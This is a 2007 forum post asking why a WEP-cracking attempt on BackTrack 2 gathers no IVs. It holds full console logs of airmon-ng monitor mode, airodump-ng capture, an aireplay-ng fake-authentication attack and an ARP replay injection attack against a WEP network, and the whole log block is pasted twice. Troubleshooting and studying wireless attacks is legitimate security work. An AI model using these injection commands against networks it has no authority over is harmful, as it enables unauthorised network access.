tybalt
03-16-2007, 08:11 AM
Well, I messed around a bit more. I was using BT2 Beta Nov-19. I downloaded BT2 Final and verified MD5 then burned to CD. Booted PC and began the process again. I'm still having the same problems. Packets are being sent but IVs don't go up. Here's the steps I took:
================================================== ============================================
**Console #1** Install device, Put ath0 in "monitor mode", Verify w/'iwconfig', Start airodump
================================================== ============================================
bt ~ # dmesg | tail
wifi0: turboA rates: 6Mbps 9Mbps 12Mbps 18Mbps 24Mbps 36Mbps 48Mbps 54Mbps
wifi0: H/W encryption support: WEP AES
wifi0: mac 4.2 phy 3.0 5 GHz radio 1.7 2 GHz radio 2.3
wifi0: Use hw queue 0 for WME_AC_BE traffic
wifi0: Use hw queue 0 for WME_AC_BK traffic
wifi0: Use hw queue 0 for WME_AC_VI traffic
wifi0: Use hw queue 0 for WME_AC_VO traffic
wifi0: Use hw queue 8 for CAB traffic
wifi0: Use hw queue 9 for beacons
wifi0: Atheros 5211: mem=0x54000000, irq=11
bt ~ # modprobe ath_pci
bt ~ # airmon-ng stop ath0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
bt ~ # airmon-ng start wifi0 9
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
bt ~ # ifconfig ath0 up
bt ~ # iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.
ath0 IEEE 802.11b ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:20:A6:4C:99:4B
Bit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-98 dBm Noise level=-98 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
bt ~ # airodump-ng --ivs -c 9 -w test_dump ath0
CH 9 ][ Elapsed: 5 mins ][ 2007-03-16 01:18
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:0F:66:2F:7D:E3 46 83 335 6 0 9 11 WEP WEP OPN penguin
BSSID STATION PWR Lost Packets Probes
00:0F:66:2F:7D:E3 00:20:A6:4C:99:4B 48 0 15027
================================================== ===========================================
**Console #2** Init FakeAuth attack
================================================== ===========================================
bt ~ # aireplay-ng -1 6000 -o 1 -q 10 -e penguin -a 00:0F:66:2F:7D:E3 -h 00:20:A6:4C:99:4B ath0
01:17:07 Sending Authentication Request
01:17:07 Authentication successful
01:17:07 Sending Association Request
01:17:07 Association successful :-)
01:17:17 Sending keep-alive packet
01:17:27 Sending keep-alive packet
01:17:37 Sending keep-alive packet
01:17:47 Sending keep-alive packet
01:17:57 Sending keep-alive packet
01:18:07 Sending keep-alive packet
01:18:17 Sending keep-alive packet
01:18:27 Sending keep-alive packet
01:18:37 Sending keep-alive packet
01:18:47 Sending keep-alive packet
01:18:57 Sending keep-alive packet
01:19:07 Sending keep-alive packet
================================================== ===========================================
**Console #3** Init ARP Replay attack
================================================== ===========================================
bt ~ # aireplay-ng -3 -b 00:0F:66:2F:7D:E3 -h 00:20:A6:4C:99:4B ath0
Saving ARP requests in replay_arp-0316-011702.cap
You should also start airodump-ng to capture replies.
Read 40398 packets (got 6 ARP requests), sent 20112 packets...
================================================== ============================================
**Console #4** Ping unknown host via wired client
================================================== ============================================
bt ~ # ping 192.168.1.130
PING 192.168.1.130 (192.168.1.130) 56(84) bytes of data.
From 192.168.1.100 icmp_seq=1 Destination Host Unreachable
From 192.168.1.100 icmp_seq=2 Destination Host Unreachable
From 192.168.1.100 icmp_seq=3 Destination Host Unreachable
--- 192.168.1.130 ping statistics ---
6 packets transmitted, 0 received, +3 errors, 100% packet loss, time 5033ms
, pipe 3
================================================== ============================================
**End**
================================================== ============================================
================================================== ============================================
**Console #1** Install device, Put ath0 in "monitor mode", Verify w/'iwconfig', Start airodump
================================================== ============================================
bt ~ # dmesg | tail
wifi0: turboA rates: 6Mbps 9Mbps 12Mbps 18Mbps 24Mbps 36Mbps 48Mbps 54Mbps
wifi0: H/W encryption support: WEP AES
wifi0: mac 4.2 phy 3.0 5 GHz radio 1.7 2 GHz radio 2.3
wifi0: Use hw queue 0 for WME_AC_BE traffic
wifi0: Use hw queue 0 for WME_AC_BK traffic
wifi0: Use hw queue 0 for WME_AC_VI traffic
wifi0: Use hw queue 0 for WME_AC_VO traffic
wifi0: Use hw queue 8 for CAB traffic
wifi0: Use hw queue 9 for beacons
wifi0: Atheros 5211: mem=0x54000000, irq=11
bt ~ # modprobe ath_pci
bt ~ # airmon-ng stop ath0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
bt ~ # airmon-ng start wifi0 9
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
bt ~ # ifconfig ath0 up
bt ~ # iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.
ath0 IEEE 802.11b ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:20:A6:4C:99:4B
Bit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-98 dBm Noise level=-98 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
bt ~ # airodump-ng --ivs -c 9 -w test_dump ath0
CH 9 ][ Elapsed: 5 mins ][ 2007-03-16 01:18
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:0F:66:2F:7D:E3 46 83 335 6 0 9 11 WEP WEP OPN penguin
BSSID STATION PWR Lost Packets Probes
00:0F:66:2F:7D:E3 00:20:A6:4C:99:4B 48 0 15027
================================================== ===========================================
**Console #2** Init FakeAuth attack
================================================== ===========================================
bt ~ # aireplay-ng -1 6000 -o 1 -q 10 -e penguin -a 00:0F:66:2F:7D:E3 -h 00:20:A6:4C:99:4B ath0
01:17:07 Sending Authentication Request
01:17:07 Authentication successful
01:17:07 Sending Association Request
01:17:07 Association successful :-)
01:17:17 Sending keep-alive packet
01:17:27 Sending keep-alive packet
01:17:37 Sending keep-alive packet
01:17:47 Sending keep-alive packet
01:17:57 Sending keep-alive packet
01:18:07 Sending keep-alive packet
01:18:17 Sending keep-alive packet
01:18:27 Sending keep-alive packet
01:18:37 Sending keep-alive packet
01:18:47 Sending keep-alive packet
01:18:57 Sending keep-alive packet
01:19:07 Sending keep-alive packet
================================================== ===========================================
**Console #3** Init ARP Replay attack
================================================== ===========================================
bt ~ # aireplay-ng -3 -b 00:0F:66:2F:7D:E3 -h 00:20:A6:4C:99:4B ath0
Saving ARP requests in replay_arp-0316-011702.cap
You should also start airodump-ng to capture replies.
Read 40398 packets (got 6 ARP requests), sent 20112 packets...
================================================== ============================================
**Console #4** Ping unknown host via wired client
================================================== ============================================
bt ~ # ping 192.168.1.130
PING 192.168.1.130 (192.168.1.130) 56(84) bytes of data.
From 192.168.1.100 icmp_seq=1 Destination Host Unreachable
From 192.168.1.100 icmp_seq=2 Destination Host Unreachable
From 192.168.1.100 icmp_seq=3 Destination Host Unreachable
--- 192.168.1.130 ping statistics ---
6 packets transmitted, 0 received, +3 errors, 100% packet loss, time 5033ms
, pipe 3
================================================== ============================================
**End**
================================================== ============================================